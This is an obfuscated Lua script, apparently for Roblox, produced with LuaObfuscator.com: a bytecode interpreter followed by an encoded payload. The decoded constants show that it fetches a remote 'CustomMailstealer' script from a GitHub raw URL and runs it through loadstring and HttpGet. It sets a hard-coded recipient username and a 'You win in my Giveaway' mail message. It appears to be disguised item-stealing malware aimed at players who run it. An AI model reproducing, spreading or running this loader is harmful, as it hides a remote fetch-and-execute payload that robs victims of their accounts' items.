--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v82,v19);v19=nil;v90=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==((1065 -(68 + 997)) -(1270 -(226 + 1044)))) then v84=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -((1597 -1230) + 201)))) + (928 -(214 + 713)))) ;return v84-(v84%1) ;end end else local v85=0 + 0 ;local v86;while true do if (v85==(0 + 0)) then v86=(879 -(282 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v86 + v86))>=v86) and ((118 -(32 + 85)) + 0)) or (0 -0) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=958 -(892 + 65) ;end if (v34==((3 -1) -(1 -0))) then return v35;end end end local function v22()local v36=350 -(87 + 263) ;local v37;local v38;while true do if (v36==(180 -(49 + 18 + 113))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -5) ;v36=2 -1 ;end if (v36==(2 -(998 -(915 + 82)))) then return (v38 * (464 -208)) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;return (v42 * (22064430 -(11995161 -6707947))) + (v41 * 65536) + (v40 * (1443 -(1069 + (257 -139)))) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=773 -(201 + 571) ;local v46=(v20(v44,1 + 0 ,35 -15 ) * ((2 + 0)^(823 -(368 + 423)))) + v43 ;local v47=v20(v44,65 -(18 + 26) ,49 -(10 + 8) );local v48=((v20(v44,122 -(309 -219) )==(443 -(416 + 26))) and  -(3 -2)) or (2 -1) ;if (v47==(0 + 0)) then if (v46==((1747 -(760 + 987)) -0)) then return v48 * (0 + 0) ;else v47=1;v45=438 -(145 + 293) ;end elseif (v47==(2477 -(44 + (2299 -(1789 + 124))))) then return ((v46==((2252 -(745 + 21)) -(998 + 488))) and (v48 * ((1 -0)/(1080 -(1020 + 21 + 39))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((6 -4)^(43 + 9)))) ;end local function v25(v49)local v50=0 -(1413 -(447 + 966)) ;local v51;local v52;while true do if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==((8 -5) + 0)) then return v6(v52);end if (0==v50) then v51=nil;if  not v49 then v49=v23();if (v49==(1055 -(87 + (2785 -(1703 + 114))))) then return "";end end v50=4 -3 ;end if (v50==2) then v52={};for v92=1 + 0 , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=6 -3 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((3 -1)==v53) then v58=nil;v59=nil;v53=3 -0 ;end if ((1 + 0)==v53) then v56=nil;v57=nil;v53=2;end if (v53~=3) then else v60=nil;v61=nil;v53=4;end if (v53==4) then while true do if (v54~=1) then else local v98=0;while true do if (v98==(0 -0)) then v57=nil;v58=nil;v98=1252 -(721 + 530) ;end if (v98==(1272 -(945 + 326))) then v54=4 -2 ;break;end end end if (v54~=(2 + 0)) then else local v99=0;while true do if ((701 -(271 + 429))==v99) then v54=3 + 0 ;break;end if (v99==0) then v59=nil;v60=nil;v99=1;end end end if ((1503 -(1408 + 92))~=v54) then else v61=nil;while true do local v101=0;while true do if (v101==0) then if (v55==0) then local v142=1086 -(461 + 625) ;while true do if (v142==(1289 -(993 + 295))) then v58={};v55=1;break;end if (v142==0) then local v156=0 + 0 ;while true do if (0==v156) then v56={};v57={};v156=1;end if (1==v156) then v142=1;break;end end end end end if (v55~=3) then else local v143=0;while true do if (v143~=(1171 -(418 + 753))) then else for v157=1 + 0 ,v23() do v57[v157-(1 + 0) ]=v28();end return v59;end end end v101=1 + 0 ;end if (v101==(1 + 0)) then if (v55~=1) then else v59={v56,v57,nil,v58};v60=v23();v61={};v55=1 + 1 ;end if (v55~=(1324 -(1249 + 73))) then else local v144=0 + 0 ;local v145;while true do if (v144==0) then v145=0;while true do if ((1145 -(466 + 679))~=v145) then else local v159=0 -0 ;while true do if (v159==0) then for v165=1,v60 do local v166=0;local v167;local v168;local v169;while true do if (v166~=(2 -1)) then else v169=nil;while true do if (v167==0) then v168=v21();v169=nil;v167=1901 -(106 + 1794) ;end if ((1 + 0)~=v167) then else if (v168==(1 + 0)) then v169=v21()~=0 ;elseif (v168==2) then v169=v24();elseif (v168~=(8 -5)) then else v169=v25();end v61[v165]=v169;break;end end break;end if (v166==(0 -0)) then v167=0;v168=nil;v166=115 -(4 + 110) ;end end end v59[3]=v21();v159=1;end if (v159~=1) then else v145=585 -(57 + 527) ;break;end end end if (v145~=(1428 -(41 + 1386))) then else for v160=104 -(17 + 86) ,v23() do local v161=0 + 0 ;local v162;local v163;while true do if (0==v161) then local v170=0 -0 ;local v171;while true do if ((0 -0)==v170) then v171=0;while true do if (v171==0) then local v180=166 -(122 + 44) ;while true do if (v180==(0 -0)) then v162=0 -0 ;v163=nil;v180=1 + 0 ;end if (v180~=1) then else v171=1;break;end end end if (v171~=1) then else v161=1 + 0 ;break;end end break;end end end if (v161==1) then while true do if (v162~=0) then else v163=v21();if (v20(v163,1 -0 ,66 -(30 + 35) )==0) then local v172=0 + 0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172~=(1260 -(1043 + 214))) then else while true do if (v173==(3 -2)) then v176=nil;v177=nil;v173=1214 -(323 + 889) ;end if (v173~=(5 -3)) then else v178=nil;while true do if (v174~=1) then else local v181=0;while true do if ((581 -(361 + 219))~=v181) then else v174=2;break;end if (v181~=(320 -(53 + 267))) then else v177=nil;v178=nil;v181=1;end end end if (v174==(1 + 1)) then while true do if ((414 -(15 + 398))~=v175) then else local v183=0;while true do if (v183==0) then local v189=982 -(18 + 964) ;while true do if (v189~=(0 -0)) then else local v193=0;while true do if (v193==(0 + 0)) then v178={v22(),v22(),nil,nil};if (v176==(850 -(20 + 830))) then local v199=0 + 0 ;local v200;local v201;while true do if ((126 -(116 + 10))~=v199) then else local v203=0;while true do if (v203~=(0 + 0)) then else v200=738 -(542 + 196) ;v201=nil;v203=1;end if (v203==1) then v199=1;break;end end end if (v199~=1) then else while true do if ((0 -0)==v200) then v201=0;while true do if (v201~=0) then else v178[1 + 2 ]=v22();v178[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v176==1) then v178[2 + 1 ]=v23();elseif (v176==2) then v178[7 -4 ]=v23() -(2^(40 -24)) ;elseif (v176~=(1554 -(1126 + 425))) then else local v205=0;local v206;while true do if (v205==0) then v206=405 -(118 + 287) ;while true do if (0~=v206) then else v178[3]=v23() -(2^16) ;v178[4]=v22();break;end end break;end end end v193=3 -2 ;end if (v193==(1122 -(118 + 1003))) then v189=1;break;end end end if (v189==1) then v183=2 -1 ;break;end end end if (v183==1) then v175=379 -(142 + 235) ;break;end end end if (v175==0) then local v184=0;while true do if ((4 -3)~=v184) then else v175=1;break;end if (0~=v184) then else local v190=0;local v191;while true do if ((0 + 0)~=v190) then else v191=977 -(553 + 424) ;while true do if (v191==1) then v184=1;break;end if (v191~=0) then else local v198=0 -0 ;while true do if (v198~=0) then else v176=v20(v163,2 + 0 ,3 + 0 );v177=v20(v163,4,6);v198=1;end if (v198~=1) then else v191=1;break;end end end end break;end end end end end if ((2 + 1)==v175) then if (v20(v177,3,2 + 1 )==1) then v178[3 + 1 ]=v61[v178[8 -4 ]];end v56[v160]=v178;break;end if (v175~=(5 -3)) then else local v186=0;while true do if (v186~=(0 -0)) then else local v192=0;while true do if (v192~=0) then else if (v20(v177,1 + 0 ,1)~=(4 -3)) then else v178[755 -(239 + 514) ]=v61[v178[1 + 1 ]];end if (v20(v177,2,1331 -(797 + 532) )==1) then v178[3]=v61[v178[3]];end v192=1;end if (v192==(1 + 0)) then v186=1;break;end end end if (v186==1) then v175=2 + 1 ;break;end end end end break;end if (v174~=(0 -0)) then else local v182=1202 -(373 + 829) ;while true do if (v182==(732 -(476 + 255))) then v174=1;break;end if (v182==0) then v175=1130 -(369 + 761) ;v176=nil;v182=1 + 0 ;end end end end break;end if (v173~=(0 -0)) then else v174=0 -0 ;v175=nil;v173=1;end end break;end if (v172~=(238 -(64 + 174))) then else v173=0 + 0 ;v174=nil;v172=1 -0 ;end if (v172~=(338 -(144 + 192))) then else v177=nil;v178=nil;v172=3;end if (v172==(217 -(42 + 174))) then v175=nil;v176=nil;v172=2;end end end break;end end break;end end end v55=3;break;end end break;end end end break;end end end break;end if (v54==(0 + 0)) then local v100=0 + 0 ;while true do if (v100==(0 + 0)) then v55=1504 -(363 + 1141) ;v56=nil;v100=1;end if (v100~=(1581 -(1183 + 397))) then else v54=1;break;end end end end break;end if (v53==(0 -0)) then v54=0 + 0 ;v55=nil;v53=1 + 0 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81>0) then v72=v80[3];else local v103=v80[2];v78[v103]=v78[v103](v13(v78,v103 + 1 ,v73));end elseif (v81<=2) then v78[v80[2]]();elseif (v81==3) then local v122=0;local v123;local v124;while true do if (v122==0) then v123=v80[2];v124=v78[v80[3]];v122=1;end if (v122==1) then v78[v123 + 1 ]=v124;v78[v123]=v124[v80[4]];break;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=7) then if (v81<=5) then local v105;local v106,v107;local v108;local v109;v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v108=v78[v80[3]];v78[v109 + 1 ]=v108;v78[v109]=v108[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v106,v107=v71(v78[v109](v13(v78,v109 + 1 ,v80[3])));v73=(v107 + v109) -1 ;v105=0;for v119=v109,v73 do v105=v105 + 1 ;v78[v119]=v106[v105];end v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81==6) then v78[v80[2]]=v80[3];else do return;end end elseif (v81<=8) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==9) then v64[v80[3]]=v78[v80[2]];else local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v140=v136,v73 do local v141=0;while true do if (v141==0) then v139=v139 + 1 ;v78[v140]=v137[v139];break;end end end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503163O00596F752077696E20696E206D79204769766561776179030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030D3O007975646970756E2O676F6C3237030F3O00475F4C6F6164696E675363722O656E030A3O005072656D69756D477569001E3O0012063O00013O0026083O000D000100020004013O000D0001001206000100043O001205000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001D00010026083O0001000100010004013O00010001001206000100013O00260800010017000100010004013O001700010012060002000A3O001209000200093O0012060002000C3O0012090002000B3O001206000100023O00260800010010000100020004013O001000010012063O00023O0004013O000100010004013O001000010004013O000100012O00073O00017O00",v9(),...);
